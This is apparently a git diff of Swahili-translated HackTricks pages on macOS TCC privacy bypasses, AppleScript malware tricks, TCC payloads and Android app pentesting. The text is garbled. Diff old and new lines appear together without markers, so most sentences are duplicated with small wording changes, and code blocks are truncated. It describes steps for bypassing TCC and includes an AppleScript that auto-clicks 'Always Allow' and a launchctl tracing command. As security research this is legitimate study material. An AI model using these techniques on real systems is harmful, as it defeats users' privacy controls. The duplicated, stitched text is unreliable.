### CVE-2023-38571 - Muziki & TV <a href="#cve-2023-38571-a-macos-tcc-bypass-in-music-and-tv" id="cve-2023-38571-a-macos-tcc-bypass-in-music-and-tv"></a>
**`Music`** ina kipengele cha kuvutia: Wakati inafanya kazi, itafanya **kuagiza** faili zilizotupwa kwenye **`~/Music/Music/Media.localized/Automatically Add to Music.localized`** katika "maktaba ya media" ya mtumiaji. Zaidi ya hayo, inaita kitu kama: **`rename(a, b);`** ambapo `a` na `b` ni:
**`Muziki`** una kipengele cha kuvutia: Wakati inafanya kazi, itafanya **kuagiza** faili zilizotupwa kwenye **`~/Music/Music/Media.localized/Automatically Add to Music.localized`** katika "maktaba ya media" ya mtumiaji. Zaidi ya hayo, inaita kitu kama: **`rename(a, b);`** ambapo `a` na `b` ni:
- `a = "~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3"`
- `b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3`
Hii **`rename(a, b);`** tabia ni dhaifu kwa **Race Condition**, kwani inawezekana kuweka ndani ya folda `Automatically Add to Music.localized` faili bandia ya **TCC.db** na kisha wakati folda mpya (b) inaundwa ili kunakili faili, ifutwe, na kuelekezwe kwa **`~/Library/Application Support/com.apple.TCC`**/.
Hii **`rename(a, b);`** tabia ni dhaifu kwa **Race Condition**, kwani inawezekana kuweka ndani ya folda `Automatically Add to Music.localized` faili bandia ya **TCC.db** na kisha wakati folda mpya (b) inaundwa ili nakala faili, ifutwe, na kuelekezwe kwa **`~/Library/Application Support/com.apple.TCC`**/.
### SQLITE_SQLLOG_DIR - CVE-2023-32422
Ikiwa **`SQLITE_SQLLOG_DIR="path/folder"`** inamaanisha kwamba **databasi yoyote iliyo wazi inakopiwa kwenye njia hiyo**. Katika CVE hii udhibiti huu ulitumiwa vibaya ili **kuandika** ndani ya **SQLite database** ambayo itafunguliwa na mchakato wenye FDA ya TCC database, na kisha kutumia **`SQLITE_SQLLOG_DIR`** na **symlink katika jina la faili** hivyo wakati databasi hiyo inafunguliwa, mtumiaji **TCC.db inabadilishwa** na ile iliyo wazi.\
**Maelezo zaidi** [**katika andiko**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **na**[ **katika mazungumzo**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y&t=20548s).
Ikiwa **`SQLITE_SQLLOG_DIR="path/folder"`** maana yake ni kwamba **databasi yoyote iliyo wazi inakopishwa kwenye njia hiyo**. Katika CVE hii udhibiti huu ulitumiwa vibaya ili **kuandika** ndani ya **SQLite database** ambayo itafunguliwa na mchakato wenye FDA ya TCC database, na kisha kutumia **`SQLITE_SQLLOG_DIR`** na **symlink katika jina la faili** hivyo wakati databasi hiyo inafunguliwa, mtumiaji **TCC.db inabadilishwa** na ile iliyo wazi.\
**Maelezo zaidi** [**katika andiko**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **na** [**katika mazungumzo**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y&t=20548s).
### **SQLITE_AUTO_TRACE**
Ikiwa variable ya mazingira **`SQLITE_AUTO_TRACE`** imewekwa, maktaba **`libsqlite3.dylib`** itaanza **kurekodi** maswali yote ya SQL. Programu nyingi zilikuwa zikitumika maktaba hii, hivyo ilikuwa inawezekana kurekodi maswali yao yote ya SQLite.
Ikiwa variable ya mazingira **`SQLITE_AUTO_TRACE`** imewekwa, maktaba **`libsqlite3.dylib`** itaanza **kurekodi** maswali yote ya SQL. Programu nyingi zilitumika maktaba hii, hivyo ilikuwa inawezekana kurekodi maswali yao yote ya SQLite.
Programu kadhaa za Apple zilikuwa zikitumika maktaba hii kufikia taarifa zilizo na ulinzi wa TCC.
Programu kadhaa za Apple zilitumia maktaba hii kufikia taarifa zilizo na ulinzi wa TCC.
```bash
# Set this env variable everywhere
launchctl setenv SQLITE_AUTO_TRACE 1
@ -190,7 +190,7 @@ Kuweka yafuatayo: `MTL_DUMP_PIPELINES_TO_JSON_FILE="path/name"`. Ikiwa `path` ni
Ni uandishi wa faili wa muda, ikifuatia **`rename(old, new)`** **ambayo si salama.**
Si salama kwa sababu inahitaji **kutatua njia za zamani na mpya tofauti**, ambayo inaweza kuchukua muda na inaweza kuwa hatarini kwa Condition ya Mbio. Kwa maelezo zaidi unaweza kuangalia kazi ya `xnu` `renameat_internal()`.
Si salama kwa sababu inahitaji **kufafanua njia za zamani na mpya tofauti**, ambayo inaweza kuchukua muda na inaweza kuwa hatarini kwa Condition ya Mbio. Kwa maelezo zaidi unaweza kuangalia kazi ya `xnu` `renameat_internal()`.
> [!CAUTION]
> Hivyo, kimsingi, ikiwa mchakato wenye mamlaka unabadilisha jina kutoka folda unayodhibiti, unaweza kupata RCE na kufanya iweze kufikia faili tofauti au, kama katika CVE hii, kufungua faili ambayo programu yenye mamlaka iliumba na kuhifadhi FD.
@ -209,7 +209,7 @@ Hii ilikuwa shambulio katika CVE: Kwa mfano, ili kufuta `TCC.db` ya mtumiaji, tu
- tunafanya hivi ili kuongeza nafasi zetu za kufanikiwa kwani dirisha la mbio ni finyu sana, lakini kupoteza mbio kuna hasara ndogo
- subiri kidogo
- jaribu ikiwa tumepata bahati
- ikiwa sivyo, endesha tena kutoka juu
- ikiwa si, endesha tena kutoka juu
Maelezo zaidi katika [https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html](https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html)
@ -237,14 +237,14 @@ Hivyo, ikiwa mtumiaji atafanikiwa kuanzisha upya TCC na $HOME env variable ikiel
**POC ya kwanza** inatumia [**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/) na [**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/) kubadilisha **HOME** folder ya mtumiaji.
1. Pata _csreq_ blob kwa programu lengwa.
2. Pandisha faili ya uwongo _TCC.db_ yenye ufikiaji unaohitajika na _csreq_ blob.
3. Exporting entry ya Huduma za Katalogi ya mtumiaji kwa kutumia [**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/).
2. Panda faili ya uwongo _TCC.db_ yenye ufikiaji unaohitajika na _csreq_ blob.
3. Exporting entry ya Huduma za Katalogi ya mtumiaji kwa [**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/).
4. Badilisha entry ya Huduma za Katalogi kubadilisha folda ya nyumbani ya mtumiaji.
5. Ingiza entry iliyobadilishwa ya Huduma za Katalogi kwa kutumia [**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/).
5. Ingiza entry iliyobadilishwa ya Huduma za Katalogi kwa [**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/).
6. Simamisha _tccd_ ya mtumiaji na upya mchakato.
POC ya pili ilitumia **`/usr/libexec/configd`** ambayo ilikuwa na `com.apple.private.tcc.allow` yenye thamani `kTCCServiceSystemPolicySysAdminFiles`.\
Ilikuwa inawezekana kuendesha **`configd`** na chaguo la **`-t`**, mshambuliaji angeweza kubainisha **Bundle maalum ya kupakia**. Hivyo, exploit **inabadilisha** njia ya **`dsexport`** na **`dsimport`** ya kubadilisha folda ya nyumbani ya mtumiaji kwa **`configd` code injection**.
Ilikuwa inawezekana kuendesha **`configd`** na chaguo la **`-t`**, mshambuliaji angeweza kubainisha **Bundle maalum ya kupakia**. Hivyo, exploit **inabadilisha** mbinu ya **`dsexport`** na **`dsimport`** ya kubadilisha folda ya nyumbani ya mtumiaji kwa **`configd` code injection**.
Kwa maelezo zaidi angalia [**ripoti ya asili**](https://www.microsoft.com/en-us/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/).
@ -257,19 +257,19 @@ Kuna mbinu tofauti za kuingiza msimbo ndani ya mchakato na kutumia ruhusa zake z
{{#endref}}
Zaidi ya hayo, sindano ya mchakato ya kawaida zaidi ili kupita TCC iliyoonekana ni kupitia **plugins (load library)**.\
Plugins ni msimbo wa ziada kawaida katika mfumo wa maktaba au plist, ambayo itakuwa **imepakiwa na programu kuu** na itatekelezwa chini ya muktadha wake. Hivyo, ikiwa programu kuu ilikuwa na ufikiaji wa faili zilizozuiliwa na TCC (kupitia ruhusa au haki zilizotolewa), **msimbo maalum pia utakuwa nao**.
Plugins ni msimbo wa ziada kawaida katika mfumo wa maktaba au plist, ambayo itakuwa **imepakiwa na programu kuu** na itatekelezwa chini ya muktadha wake. Hivyo, ikiwa programu kuu ilikuwa na ufikiaji wa faili zilizozuiliwa za TCC (kupitia ruhusa au haki zilizotolewa), **msimbo maalum pia utakuwa nao**.
### CVE-2020-27937 - Directory Utility
Programu `/System/Library/CoreServices/Applications/Directory Utility.app` ilikuwa na haki **`kTCCServiceSystemPolicySysAdminFiles`**, ilipakia plugins zenye **`.daplug`** upanuzi na **haikuwa na** runtime iliyohardishwa.
Programu `/System/Library/CoreServices/Applications/Directory Utility.app` ilikuwa na ruhusa **`kTCCServiceSystemPolicySysAdminFiles`**, ilipakia plugins zenye **`.daplug`** upanuzi na **haikuwa na** runtime iliyohardishwa.
Ili kuweka silaha CVE hii, **`NFSHomeDirectory`** inabadilishwa (ikifanya matumizi ya haki ya awali) ili kuwa na uwezo wa **kuchukua database ya TCC ya watumiaji** ili kupita TCC.
Ili kuweka silaha CVE hii, **`NFSHomeDirectory`** inabadilishwa (ikifanya matumizi ya ruhusa ya awali) ili kuwa na uwezo wa **kuchukua database ya TCC ya watumiaji** ili kupita TCC.
Kwa maelezo zaidi angalia [**ripoti ya asili**](https://wojciechregula.blog/post/change-home-directory-and-bypass-tcc-aka-cve-2020-27937/).
### CVE-2020-29621 - Coreaudiod
Binary **`/usr/sbin/coreaudiod`** ilikuwa na haki `com.apple.security.cs.disable-library-validation` na `com.apple.private.tcc.manager`. Ya kwanza **ikitoa ruhusa ya sindano ya msimbo** na ya pili ikitoa ufikiaji wa **kusimamia TCC**.
Binary **`/usr/sbin/coreaudiod`** ilikuwa na ruhusa `com.apple.security.cs.disable-library-validation` na `com.apple.private.tcc.manager`. Ya kwanza **ikitoa ruhusa ya sindano ya msimbo** na ya pili ikitoa ufikiaji wa **kusimamia TCC**.
Binary hii iliruhusu kupakia **plugins za upande wa tatu** kutoka folda `/Library/Audio/Plug-Ins/HAL`. Hivyo, ilikuwa inawezekana **kupakia plugin na kutumia ruhusa za TCC** na PoC hii:
```objectivec
@ -402,7 +402,7 @@ Scripts za **`.terminal`** ni faili za plist kama hii yenye amri ya kutekeleza k
</dict>
</plist>
```
Programu inaweza kuandika skripti ya terminal katika eneo kama /tmp na kuizindua kwa amri kama:
Programu inaweza kuandika skripti ya terminal katika eneo kama /tmp na kuizindua kwa kutumia amri kama:
```objectivec
// Write plist in /tmp/tcc.terminal
[...]
@ -417,7 +417,7 @@ exploit_location]; task.standardOutput = pipe;
### CVE-2020-9771 - mount_apfs TCC bypass na kupandisha hadhi
**Mtumiaji yeyote** (hata wasio na mamlaka) anaweza kuunda na kuunganisha picha ya mashine ya wakati na **kufikia FAILI ZOTE** za picha hiyo.\
**Mtumiaji yeyote** (hata wasio na mamlaka) anaweza kuunda na kuunganisha picha ya muda ya mashine na **kufikia FAILI ZOTE** za picha hiyo.\
**Mamlaka pekee** inayohitajika ni kwa programu inayotumika (kama `Terminal`) kuwa na **Upatikanaji wa Diski Kamili** (FDA) (`kTCCServiceSystemPolicyAllfiles`) ambayo inahitaji kupewa na msimamizi.
```bash
# Create snapshot
@ -490,7 +490,7 @@ Folda **`/var/db/locationd/` haikupatiwa ulinzi dhidi ya DMG mounting** hivyo il
## Kwa grep
Katika matukio kadhaa, faili zitahifadhi taarifa nyeti kama barua pepe, nambari za simu, ujumbe... katika maeneo yasiyolindwa (ambayo yanachukuliwa kama udhaifu katika Apple).
Katika matukio kadhaa faili zitahifadhi taarifa nyeti kama barua pepe, nambari za simu, ujumbe... katika maeneo yasiyolindwa (ambayo yanachukuliwa kama udhaifu katika Apple).
<figure><img src="../../../../../images/image (474).png" alt=""><figcaption></figcaption></figure>

8
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md
View File

@ -4,8 +4,8 @@
## Apple Scripts
Ni lugha ya skripti inayotumika kwa ajili ya automatisering ya kazi **kuhusiana na michakato ya mbali**. Inafanya iwe rahisi **kuomba michakato mingine kutekeleza vitendo vingine**. **Malware** inaweza kutumia vipengele hivi kuharibu kazi zinazotolewa na michakato mingine.\
Kwa mfano, malware inaweza **kuingiza msimbo wa JS wa kiholela katika kurasa zilizofunguliwa na kivinjari**. Au **kubonyeza kiotomatiki** baadhi ya ruhusa zinazohitajika kwa mtumiaji;
Ni lugha ya skripti inayotumika kwa otomatiki ya kazi **kuingiliana na michakato ya mbali**. Inafanya iwe rahisi **kuomba michakato mingine kufanya vitendo vingine**. **Malware** inaweza kutumia vipengele hivi kuabusu kazi zinazotolewa na michakato mingine.\
Kwa mfano, malware inaweza **kuingiza msimbo wa JS wa kiholela katika kurasa zilizofunguliwa za kivinjari**. Au **kubonyeza kiotomatiki** baadhi ya ruhusa zinazotakiwa kwa mtumiaji;
```applescript
tell window 1 of process "SecurityAgent"
click button "Always Allow" of group 1
@ -16,14 +16,14 @@ Pata maelezo zaidi kuhusu malware ukitumia applescripts [**hapa**](https://www.s
Apple scripts zinaweza "kuandikwa" kwa urahisi. Matoleo haya yanaweza "kufutwa" kwa urahisi kwa kutumia `osadecompile`
Hata hivyo, scripts hizi zinaweza pia **kuzuiliwa kama "Soma tu"** (kupitia chaguo la "Export..."):
Hata hivyo, scripts hizi zinaweza pia **kuzalishwa kama "Soma tu"** (kupitia chaguo la "Export..."):
<figure><img src="https://github.com/carlospolop/hacktricks/raw/master/images/image%20(556).png" alt=""><figcaption></figcaption></figure>
```
file mal.scpt
mal.scpt: AppleScript compiled
```
na katika kesi hii maudhui hayawezi kufanywa decompile hata na `osadecompile`
na katika kesi hii maudhui hayawezi kufanywa decompilation hata na `osadecompile`
Hata hivyo, bado kuna zana ambazo zinaweza kutumika kuelewa aina hii ya executable, [**soma utafiti huu kwa maelezo zaidi**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)). Zana [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) pamoja na [**aevt_decompile**](https://github.com/SentineLabs/aevt_decompile) itakuwa muhimu sana kuelewa jinsi script inavyofanya kazi.

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md
View File

@ -573,7 +573,7 @@ ffmpeg -f avfoundation -i ":1" -t 5 /tmp/recording.wav
### Mahali
> [!TIP]
> Ili programu iweze kupata mahali, **Huduma za Mahali** (kutoka kwa Faragha & Usalama) **zinapaswa kuwa zimewezeshwa,** vinginevyo haitakuwa na uwezo wa kuzipata.
> Ili programu iweze kupata mahali, **Huduma za Mahali** (kutoka kwa Faragha & Usalama) **zinapaswa kuwezeshwa,** vinginevyo haitakuwa na uwezo wa kuzipata.
- **Ruhusa**: `com.apple.security.personal-information.location`
- **TCC**: Imepewa katika `/var/db/locationd/clients.plist`
@ -637,7 +637,7 @@ Pata ufikiaji wa eneo
{{#endtab}}
{{#endtabs}}
### Kurekodi ya Skrini
### Kurekodi Skrini
- **Haki**: Hakuna
- **TCC**: `kTCCServiceScreenCapture`
@ -877,6 +877,6 @@ return 0;
{{#endtab}}
{{#endtabs}}
> [!CAUTION] > **Upatikanaji ni ruhusa yenye nguvu sana**, unaweza kuitumia vibaya kwa njia nyingine, kwa mfano unaweza kufanya **shambulio la kubonyeza funguo** moja kwa moja kutoka hapo bila kuhitaji kuita Matukio ya Mfumo.
> [!CAUTION] > **Upatikanaji ni ruhusa yenye nguvu sana**, unaweza kuitumia vibaya kwa njia nyingine, kwa mfano unaweza kufanya **shambulio la funguo** moja kwa moja kutoka hapo bila kuhitaji kuita Matukio ya Mfumo.
{{#include ../../../../banners/hacktricks-training.md}}

138
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -2,7 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
## Msingi wa Programu za Android
## Msingi wa Maombi ya Android
Inapendekezwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **sehemu muhimu zaidi zinazohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:
@ -56,7 +56,7 @@ Kwa kuangalia tu **nyuzi** za APK unaweza kutafuta **nywila**, **URLs** ([https:
**Firebase**
Tazama kwa makini **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu nini FIrebase na jinsi ya kuitumia hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
Lipa kipaumbele maalum kwa **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu nini FIrebase na jinsi ya kuitumia hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
### Basic understanding of the application - Manifest.xml, strings.xml
@ -64,12 +64,12 @@ Tazama kwa makini **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa za
**Udhaifu** ulioainishwa kutoka kwa **Manifest.xml** ni pamoja na:
- **Programu zinazoweza kudhibitiwa**: Programu zilizowekwa kama zinazoweza kudhibitiwa (`debuggable="true"`) katika faili la _Manifest.xml_ zina hatari kwani zinaruhusu muunganisho ambao unaweza kusababisha unyakuzi. Kwa ufahamu zaidi kuhusu jinsi ya kutumia programu zinazoweza kudhibitiwa, rejelea mafunzo juu ya kutafuta na kutumia programu zinazoweza kudhibitiwa kwenye kifaa.
- **Mipangilio ya Nakala**: Sifa ya `android:allowBackup="false"` inapaswa kuwekwa wazi kwa programu zinazoshughulika na taarifa nyeti ili kuzuia nakala zisizoidhinishwa kupitia adb, hasa wakati ufuatiliaji wa usb umewezeshwa.
- **Programu zinazoweza kudhibitiwa**: Programu zilizowekwa kama zinazoweza kudhibitiwa (`debuggable="true"`) katika faili la _Manifest.xml_ zina hatari kwani zinaruhusu muunganisho ambao unaweza kusababisha matumizi mabaya. Kwa ufahamu zaidi kuhusu jinsi ya kutumia programu zinazoweza kudhibitiwa, rejelea mafunzo juu ya kutafuta na kutumia programu zinazoweza kudhibitiwa kwenye kifaa.
- **Mipangilio ya Nakala**: Sifa ya `android:allowBackup="false"` inapaswa kuwekwa wazi kwa programu zinazoshughulika na taarifa nyeti ili kuzuia nakala zisizoidhinishwa za data kupitia adb, hasa wakati ufuatiliaji wa usb umewezeshwa.
- **Usalama wa Mtandao**: Mipangilio ya usalama wa mtandao ya kawaida (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kubainisha maelezo ya usalama kama vile pini za cheti na mipangilio ya trafiki ya HTTP. Mfano ni kuruhusu trafiki ya HTTP kwa maeneo maalum.
- **Shughuli na Huduma Zilizotolewa**: Kutambua shughuli na huduma zilizotolewa katika manifest kunaweza kuonyesha vipengele ambavyo vinaweza kutumika vibaya. Uchambuzi zaidi wakati wa upimaji wa dinamik unaweza kufichua jinsi ya kutumia vipengele hivi.
- **Shughuli na Huduma Zilizotolewa**: Kutambua shughuli na huduma zilizotolewa katika manifest kunaweza kuonyesha vipengele ambavyo vinaweza kutumika vibaya. Uchambuzi zaidi wakati wa upimaji wa dynamic unaweza kufichua jinsi ya kutumia vipengele hivi.
- **Watoa Maudhui na Watoa Faili**: Watoa maudhui walio wazi wanaweza kuruhusu ufikiaji usioidhinishwa au mabadiliko ya data. Mipangilio ya Watoa Faili pia inapaswa kuchunguzwa.
- **Vipokezi vya Matangazo na Mipango ya URL**: Vipengele hivi vinaweza kutumika kwa unyakuzi, huku makini zaidi ikitolewa kwa jinsi mipango ya URL inavyosimamiwa kwa udhaifu wa ingizo.
- **Vipokezi vya Matangazo na Mipango ya URL**: Vipengele hivi vinaweza kutumika kwa matumizi mabaya, huku kukiwa na umakini maalum juu ya jinsi mipango ya URL inavyosimamiwa kwa udhaifu wa ingizo.
- **Toleo la SDK**: Sifa za `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikisisitiza umuhimu wa kutosaidia toleo la zamani la Android lenye udhaifu kwa sababu za usalama.
Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama funguo za API, mipango ya kawaida, na maelezo mengine ya waendelezaji yanaweza kugundulika, yakisisitiza hitaji la ukaguzi wa makini wa rasilimali hizi.
@ -77,7 +77,7 @@ Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama funguo za API, mipango y
### Tapjacking
**Tapjacking** ni shambulio ambapo **programu** **mbaya** inazinduliwa na **kujiweka juu ya programu ya mwathirika**. Mara inapoificha wazi programu ya mwathirika, kiolesura chake cha mtumiaji kimeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, wakati inapitisha mwingiliano huo kwa programu ya mwathirika.\
Kwa kweli, inamfanya mtumiaji **kutojua kwamba anafanya vitendo kwenye programu ya mwathirika**.
Kwa kweli, inamfanya **mtumiaji asijue kwamba anafanya vitendo kwenye programu ya mwathirika**.
Pata taarifa zaidi katika:
@ -87,7 +87,7 @@ tapjacking.md
### Task Hijacking
**shughuli** yenye **`launchMode`** iliyowekwa kuwa **`singleTask` bila `taskAffinity`** iliyofafanuliwa inahatarisha unyakuzi wa kazi. Hii inamaanisha kwamba **programu** inaweza kusakinishwa na ikiwa itazinduliwa kabla ya programu halisi inaweza **kuhijack kazi ya programu halisi** (hivyo mtumiaji atakuwa akifanya kazi na **programu mbaya akidhani anatumia halisi**).
**shughuli** yenye **`launchMode`** iliyowekwa kuwa **`singleTask` bila `taskAffinity`** iliyofafanuliwa inahatarisha kuibiwa kwa kazi. Hii inamaanisha kwamba **programu** inaweza kusakinishwa na ikiwa itazinduliwa kabla ya programu halisi inaweza **kuiba kazi ya programu halisi** (hivyo mtumiaji atakuwa akifanya kazi na **programu mbaya akidhani anatumia halisi**).
Taarifa zaidi katika:
@ -101,9 +101,9 @@ android-task-hijacking.md
Katika Android, faili **zilizohifadhiwa** katika **hifadhi ya ndani** zime **kusudiwa** kuwa **zinapatikana** pekee na **programu** iliyozitengeneza. Kipimo hiki cha usalama kinatekelezwa na mfumo wa uendeshaji wa Android na kwa ujumla kinatosha kwa mahitaji ya usalama ya programu nyingi. Hata hivyo, waendelezaji wakati mwingine hutumia njia kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` ili **kuruhusu** faili kushirikiwa kati ya programu tofauti. Hata hivyo, njia hizi **hazizuii ufikiaji** wa faili hizi na programu nyingine, ikiwa ni pamoja na zile zenye nia mbaya.
1. **Static Analysis:**
1. **Uchambuzi wa Kawaida:**
- **Hakikisha** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Njia hizi **zinaweza kufichua** faili kwa **ufikiaji usioidhinishwa au usio kusudiwa**.
2. **Dynamic Analysis:**
2. **Uchambuzi wa Dynamic:**
- **Thibitisha** **idhini** zilizowekwa kwenye faili zilizoundwa na programu. Kwa haswa, **angalia** kama faili yoyote ime **wekwa kuwa inasomeka au kuandikwa duniani kote**. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **programu yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili yake au nia, **kusoma au kubadilisha** faili hizi.
**Hifadhi ya Nje**
@ -117,10 +117,10 @@ Wakati wa kushughulikia faili kwenye **hifadhi ya nje**, kama vile Kadi za SD, t
- Hifadhi ya nje inaweza kuondolewa au kufikiwa na programu yoyote, na kufanya kuwa na usalama mdogo.
3. **Kushughulikia Data kutoka Hifadhi ya Nje**:
- Daima **fanya uthibitisho wa ingizo** kwenye data iliyopatikana kutoka hifadhi ya nje. Hii ni muhimu kwa sababu data hiyo inatoka kwenye chanzo kisichoaminika.
- Kuhifadhi executable au faili za darasa kwenye hifadhi ya nje kwa ajili ya upakiaji wa dinamik kunashauriwa kutoendeshwa.
- Ikiwa programu yako inapaswa kupata faili za executable kutoka hifadhi ya nje, hakikisha faili hizi **zime saini na kuthibitishwa kwa njia ya kisasa** kabla ya kupakiwa kwa dinamik. Hatua hii ni muhimu kwa kudumisha uaminifu wa usalama wa programu yako.
- Kuhifadhi executable au faili za darasa kwenye hifadhi ya nje kwa ajili ya upakiaji wa dynamic kunashauriwa kutoendeshwa.
- Ikiwa programu yako inapaswa kupata faili za executable kutoka hifadhi ya nje, hakikisha faili hizi zime **sainiwa na kuthibitishwa kwa njia ya kisasa** kabla ya kupakiwa kwa dynamic. Hatua hii ni muhimu kwa kudumisha uaminifu wa usalama wa programu yako.
Hifadhi ya nje inaweza **kupatikana** katika `/storage/emulated/0`, `/sdcard`, `/mnt/sdcard`
Hifadhi ya nje inaweza kufikiwa katika `/storage/emulated/0`, `/sdcard`, `/mnt/sdcard`
> [!NOTE]
> Kuanzia Android 4.4 (**API 17**), kadi ya SD ina muundo wa saraka ambao **unapunguza ufikiaji kutoka kwa programu hadi saraka ambayo ni maalum kwa programu hiyo**. Hii inazuia programu mbaya kupata ufikiaji wa kusoma au kuandika kwenye faili za programu nyingine.
@ -149,15 +149,15 @@ Wakandarasi wengine huhifadhi data nyeti katika hifadhi ya ndani na kuificha kwa
**Matumizi ya Algorithimu zisizo Salama na/au Zilizopitwa na Wakati**
Wakandarasi hawapaswi kutumia **algorithimu zilizopitwa na wakati** kufanya **ukaguzi wa uthibitishaji**, **hifadhi** au **tuma** data. Baadhi ya algorithimu hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumika kuhifadhi nywila kwa mfano, hashes zinazostahimili **brute-force** zinapaswa kutumika na chumvi.
Wakandarasi hawapaswi kutumia **algorithimu zilizopitwa na wakati** kufanya **ukaguzi wa uthibitishaji**, **hifadhi** au **tuma** data. Baadhi ya algorithimu hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumika kuhifadhi nywila kwa mfano, hashes zinazopinga **brute-force** zinapaswa kutumika na chumvi.
### Ukaguzi Mwingine
- Inapendekezwa **kuficha APK** ili kuifanya kazi ya mhandisi wa kurudi kuwa ngumu kwa washambuliaji.
- Ikiwa programu ni nyeti (kama programu za benki), inapaswa kufanya **ukaguzi wake mwenyewe kuona kama simu imejikita** na kuchukua hatua.
- Ikiwa programu ni nyeti (kama programu za benki), inapaswa kuangalia ikiwa **emulator** inatumika.
- Ikiwa programu ni nyeti (kama programu za benki), inapaswa **kuangalia uadilifu wake mwenyewe kabla ya kutekeleza** ili kuangalia ikiwa imebadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuangalia ni compiler/packer/obfuscator ipi ilitumika kujenga APK
- Ikiwa programu ni nyeti (kama programu za benki), inapaswa kuangalia kama **emulator** inatumika.
- Ikiwa programu ni nyeti (kama programu za benki), inapaswa **kuangalia uadilifu wake kabla ya kutekeleza** ili kuangalia kama imebadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuangalia ni compiler/packer/obfuscator gani ilitumika kujenga APK
### Programu ya React Native
@ -181,7 +181,7 @@ Kulingana na [**blogu hii**](https://clearbluejar.github.io/posts/desuperpacking
### Uchambuzi wa Msimbo wa Kijamii wa Kiotomatiki
Chombo [**mariana-trench**](https://github.com/facebook/mariana-trench) kina uwezo wa kugundua **vulnerabilities** kwa **kuchanganua** **msimbo** wa programu. Chombo hiki kina mfululizo wa **vyanzo vinavyojulikana** (ambavyo vinaonyesha kwa chombo **mahali** ambapo **ingizo** linadhibitiwa na mtumiaji), **mashimo** (ambayo yanaonyesha kwa chombo **mahali hatari** ambapo ingizo la mtumiaji mbaya linaweza kusababisha madhara) na **kanuni**. Kanuni hizi zinaonyesha **mchanganyiko** wa **vyanzo-mashimo** unaoashiria udhaifu.
Chombo [**mariana-trench**](https://github.com/facebook/mariana-trench) kina uwezo wa kupata **vulnerabilities** kwa **kuchanganua** **msimbo** wa programu. Chombo hiki kina mfululizo wa **vyanzo vinavyojulikana** (ambavyo vinaonyesha kwa chombo **mahali** ambapo **ingizo** linadhibitiwa na mtumiaji), **mashimo** (ambayo yanaonyesha kwa chombo **mahali hatari** ambapo ingizo la mtumiaji mbaya linaweza kusababisha madhara) na **sheria**. Sheria hizi zinaonyesha **mchanganyiko** wa **vyanzo-mashimo** unaoashiria udhaifu.
Kwa maarifa haya, **mariana-trench itakagua msimbo na kupata udhaifu unaowezekana ndani yake**.
@ -218,7 +218,7 @@ content-protocol.md
### Uchambuzi wa Kijamii Mtandaoni
Unaweza kuunda **akaunti ya bure** katika: [https://appetize.io/](https://appetize.io). Jukwaa hili linakuruhusu **kupakia** na **kutekeleza** APKs, hivyo ni muhimu kuona jinsi apk inavyofanya kazi.
Unaweza kuunda **akaunti ya bure** katika: [https://appetize.io/](https://appetize.io). Jukwaa hili linakuwezesha **kupakia** na **kutekeleza** APKs, hivyo ni muhimu kuona jinsi APK inavyofanya kazi.
Unaweza hata **kuona kumbukumbu za programu yako** kwenye wavuti na kuungana kupitia **adb**.
@ -238,12 +238,12 @@ avd-android-virtual-device.md
{{#endref}}
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Toleo la Bure:** Toleo la Kibinafsi, unahitaji kuunda akaunti. _Inapendekezwa **kupakua** toleo **PAMOJA NA**_ _**VirtualBox** ili kuepuka makosa ya uwezekano._)
- [**Nox**](https://es.bignox.com) (Bure, lakini haunga mkono Frida au Drozer).
- [**Nox**](https://es.bignox.com) (Bure, lakini haipati Frida au Drozer).
> [!NOTE]
> Unapounda emulator mpya kwenye jukwaa lolote kumbuka kwamba kadri skrini inavyokuwa kubwa, ndivyo emulator itakavyokuwa polepole. Kwa hivyo chagua skrini ndogo ikiwa inawezekana.
